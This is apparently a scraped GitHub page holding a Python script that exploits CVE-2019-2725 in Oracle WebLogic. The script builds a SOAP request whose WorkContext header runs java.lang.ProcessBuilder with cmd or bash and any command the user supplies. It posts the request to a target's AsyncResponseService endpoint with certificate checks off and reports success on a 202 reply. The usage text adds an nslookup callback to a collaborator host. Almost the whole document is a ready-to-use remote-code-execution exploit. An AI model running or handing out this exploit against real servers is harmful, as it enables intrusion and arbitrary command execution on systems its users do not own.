-
Notifications
You must be signed in to change notification settings - Fork 2
/
cve-2019-2725.py
72 lines (66 loc) · 2.4 KB
/
cve-2019-2725.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import requests
import sys
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def create_payload(cmd, cmd_base, cmd_opt):
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
cmd_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in cmd)+"</string>\r\n"
payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\r\n" \
"<soapenv:Header>\r\n" \
"<wsa:Action>xx</wsa:Action>\r\n" \
"<wsa:RelatesTo>xx</wsa:RelatesTo>\r\n" \
"<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n" \
"<void class=\"java.lang.ProcessBuilder\">\r\n" \
"<array class=\"java.lang.String\" length=\"3\">\r\n" \
"<void index=\"0\">\r\n" \
+ cmd_base + \
"</void>\r\n" \
"<void index=\"1\">\r\n" \
+ cmd_opt + \
"</void>\r\n" \
"<void index=\"2\">\r\n" \
+ cmd_filtered + \
"</void>\r\n" \
"</array>\r\n" \
"<void method=\"start\"/></void>\r\n" \
"</work:WorkContext>\r\n" \
"</soapenv:Header>\r\n" \
"<soapenv:Body>\r\n" \
"<asy:onAsyncDelivery/>\r\n" \
"</soapenv:Body>\r\n" \
"</soapenv:Envelope>"
return payload
def exploit(url, cmd):
header = {'content-type': 'text/xml'}
result = requests.post(url, create_payload(cmd, cmd_base, cmd_opt), headers = header,verify=False)
if(result.status_code == 202):
print "Command executed"
else:
print "Exploit attempt failed"
if(len(sys.argv) != 4):
print 'usage: python cve-2019-2725.py <url> <target> <command>'
print 'ex: python cve-2019-2725.py https://localhost:7001/_async/AsyncResponseService 1 \'nslookup myburpcollaboratorurl\''
print 'targets:'
print ' (1) Windows'
print ' (2) Linux'
sys.exit(1)
url = sys.argv[1]
target = int(sys.argv[2])
cmd = sys.argv[3]
if(target == 1):
cmd_base = "<string>cmd</string>\r\n"
cmd_opt = "<string>/c</string>\r\n"
elif(target == 2):
cmd_base = "<string>/bin/bash</string>\r\n"
cmd_opt = "<string>-c</string>\r\n"
else:
print 'Invalid Target'
sys.exit(-1)
exploit(url, cmd)